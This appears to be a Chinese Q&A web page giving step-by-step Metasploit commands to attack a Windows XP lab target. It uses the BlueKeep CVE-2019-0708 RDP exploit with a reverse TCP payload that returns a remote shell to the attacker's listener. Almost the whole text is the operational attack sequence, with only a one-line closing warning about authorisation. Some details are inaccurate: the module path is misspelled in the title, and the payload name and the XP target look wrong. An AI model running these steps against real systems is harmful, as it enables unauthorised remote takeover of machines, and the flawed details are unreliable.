如何利用exploit/windows/rcp/cve_2019_0708_bluekeep_rce 与 windows_reverse_tcp payload攻击windows xp靶机。
时间: 2023-07-30 20:09:35 浏览: 206
首先,需要安装 Metasploit 框架。然后,按照以下步骤进行操作:
1. 打开终端,输入以下命令启动 Metasploit 控制台:
```
msfconsole
```
2. 确认 Metasploit 已经更新到最新版本。输入以下命令进行更新:
```
msfupdate
```
3. 确认目标主机的 IP 地址,以及靶机的操作系统是否为 Windows XP。
4. 在 Metasploit 控制台中,输入以下命令来搜索漏洞利用模块:
```
search cve-2019-0708
```
5. 找到名为“exploit/windows/rdp/cve_2019_0708_bluekeep_rce”的模块,输入以下命令来使用该模块:
```
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```
6. 输入以下命令,设置目标主机的 IP 地址:
```
set RHOSTS <目标主机IP>
```
7. 输入以下命令,设置目标主机的端口号(默认为3389):
```
set RPORT <目标主机端口号>
```
8. 输入以下命令,设置 payload 为 windows/reverse_tcp:
```
set PAYLOAD windows/reverse_tcp
```
9. 输入以下命令,设置本地监听的 IP 地址:
```
set LHOST <本地IP>
```
10. 输入以下命令,设置本地监听的端口号:
```
set LPORT <本地端口号>
```
11. 输入以下命令,运行漏洞利用模块:
```
exploit
```
12. 等待靶机连接到 Metasploit 并成功获取 shell。
注意:这个漏洞已经被微软修复,因此请不要在未授权的环境中使用该漏洞进行攻击。
阅读全文